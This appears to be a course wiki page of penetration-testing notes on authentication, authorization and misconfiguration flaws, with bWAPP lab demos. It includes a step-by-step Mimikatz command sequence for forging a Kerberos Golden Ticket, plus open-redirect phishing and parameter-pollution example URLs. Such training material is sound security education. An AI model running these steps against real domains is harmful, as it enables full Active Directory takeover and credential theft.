App Vulnerabilities: Authentication and Authorization - Paiet/SEC-335 GitHub Wiki

Authentication
- Credential brute forcing
- Default credentials
- Weak credentials
- Session hijacking
- Redirect
  - Used along with SE to get target to visit malicious site
    - SE link crafted to redirect user to malicious site
    - http://realsite.com/login.php?url=http://real-site.com/login.php
    - DEMO: bWAPP Unvalidated Redirects
      - Phishing link /var/www/html/redir.html
        
        Look at link location with mouseover
- Kerberos exploits
  - Golden Ticket
    - Allows you to create a ticket that will allow you to access anything in AD
      - Ticket valid for 10 years
      - Ticket valid even if password is changed for krbtgt account
    - Post-Exploit
    - Use Mimikatz to perform attack
      1. From PS$ - whoami /user grab SID
      2. privilege::debug
      3. lsadump::lsa /inject /name:krgtgt
      4. kerberos::list (list available tickets)
      5. kerberos::tgt (current session ticket)
      6. kerberos::purge
      7. kerberos::golden /domain:pentestplus.com /sid:SID /user:admin /ticket:golden.kirbi
      8. kerberos::ptt golden.kirbi
      9. misc::cmd (opens cmd using golden ticket)
Authorization
- Parameter pollution
  - aka HTTP Parameter pollution
  - The adding of multiple instances of an HTTP parameter in a GET/POST request
    - ORIGINAL: http://site.com/?action=update?user=billy
    - POLLUTED: http://site.com/?action=update?user=billy?user=sally
    - DEMO: bWAPP HTTP Parameter Pollution
      - Explain that attacks will be limited by what the parameters actually do
        
        Could lead to
        
        Redirects > cred harvesting
        
        Acting on behalf of other users
        
        Funds transfers
- Insecure direct object reference
  - User can access and manipulate the value of an object
    - DEMO: bWAPP IDOR TICKETS (A4)
Security misconfigurations
- Using home-grown encryption instead of industry standard
- Not removing irrelevant/outdated/unused content
- Not removing debugging mechanisms once app is in production
- Sensitive data disclosure through app
  - unprotected files/folders
    - Directory is listable
    - Permissions are misconfigured
- Patches/Updates not applied
- Not setting secure values in app, API, and/or other modules
- Client-side processing of sensitive data instead of Server-side
- Not removing default creds
- Cookie manipulation